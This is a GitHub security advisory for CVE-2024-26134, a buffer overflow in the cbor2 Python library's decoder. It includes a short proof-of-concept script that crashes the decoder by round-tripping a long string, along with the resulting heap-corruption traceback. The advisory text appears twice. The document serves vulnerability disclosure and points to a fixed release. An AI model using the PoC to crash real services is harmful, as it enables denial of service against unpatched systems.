Headline
GHSA-375g-39jq-vq7m: Potential buffer overflow in CBOR2 decoder
Summary
Ever since https://github.com/agronholm/cbor2/pull/204 (or specifically https://github.com/agronholm/cbor2/commit/387755eacf0be35591a478d3c67fe10618a6d542) was merged, I can create a reproducible crash when running the snippet under PoC on a current Debian bullseye aarm64 on a Raspberry Pi 3 (I was not able to reproduce this on my x86_64 Laptop with Python 3.11; I suspect because there is enough memory to allocate still)
Details
PoC
import json
import concurrent.futures
import cbor2
def test():
obj = "x" * 131128
cbor_enc = cbor2.dumps(obj)
return cbor2.loads(cbor_enc)
with concurrent.futures.ProcessPoolExecutor() as executor:
future = executor.submit(test)
print(future.result())
malloc(): unsorted double linked list corrupted
Traceback (most recent call last):
File "test.py", line 14, in <module>
print(future.result())
File "/usr/lib/python3.9/concurrent/futures/_base.py", line 440, in result
return self.__get_result()
File "/usr/lib/python3.9/concurrent/futures/_base.py", line 389, in __get_result
raise self._exception
concurrent.futures.process.BrokenProcessPool: A process in the process pool was terminated abruptly while the future was running or pending.
If one calls it without the indirection via the pool executor, a SystemError is shown that hides the buffer overflow.
import json
import cbor2
def test():
obj = "x" * 131128
cbor_enc = cbor2.dumps(obj)
return cbor2.loads(cbor_enc)
print(test())
Traceback (most recent call last):
File "test.py", line 12, in <module>
print(test())
File "test.py", line 9, in test
return cbor2.loads(cbor_enc)
SystemError: <built-in function loads> returned NULL without setting an error
Impact
An attacker can crash a service using cbor2 to parse a CBOR binary by sending a long enough object.
Summary
Ever since agronholm/cbor2#204 (or specifically agronholm/cbor2@387755e) was merged, I can create a reproducible crash when running the snippet under PoC on a current Debian bullseye aarm64 on a Raspberry Pi 3 (I was not able to reproduce this on my x86_64 Laptop with Python 3.11; I suspect because there is enough memory to allocate still)
Details****PoC
import json import concurrent.futures import cbor2
def test(): obj = “x” * 131128 cbor_enc = cbor2.dumps(obj) return cbor2.loads(cbor_enc)
with concurrent.futures.ProcessPoolExecutor() as executor: future = executor.submit(test) print(future.result())
malloc(): unsorted double linked list corrupted
Traceback (most recent call last):
File "test.py", line 14, in <module>
print(future.result())
File "/usr/lib/python3.9/concurrent/futures/_base.py", line 440, in result
return self.__get_result()
File "/usr/lib/python3.9/concurrent/futures/_base.py", line 389, in __get_result
raise self._exception
concurrent.futures.process.BrokenProcessPool: A process in the process pool was terminated abruptly while the future was running or pending.
If one calls it without the indirection via the pool executor, a SystemError is shown that hides the buffer overflow.
import json import cbor2
def test(): obj = “x” * 131128 cbor_enc = cbor2.dumps(obj) return cbor2.loads(cbor_enc)
print(test())
Traceback (most recent call last):
File "test.py", line 12, in <module>
print(test())
File "test.py", line 9, in test
return cbor2.loads(cbor_enc)
SystemError: <built-in function loads> returned NULL without setting an error
Impact
An attacker can crash a service using cbor2 to parse a CBOR binary by sending a long enough object.
References
- GHSA-375g-39jq-vq7m
- https://nvd.nist.gov/vuln/detail/CVE-2024-26134
- agronholm/cbor2#204
- agronholm/cbor2@387755e
- agronholm/cbor2@4de6991
- https://github.com/agronholm/cbor2/releases/tag/5.6.2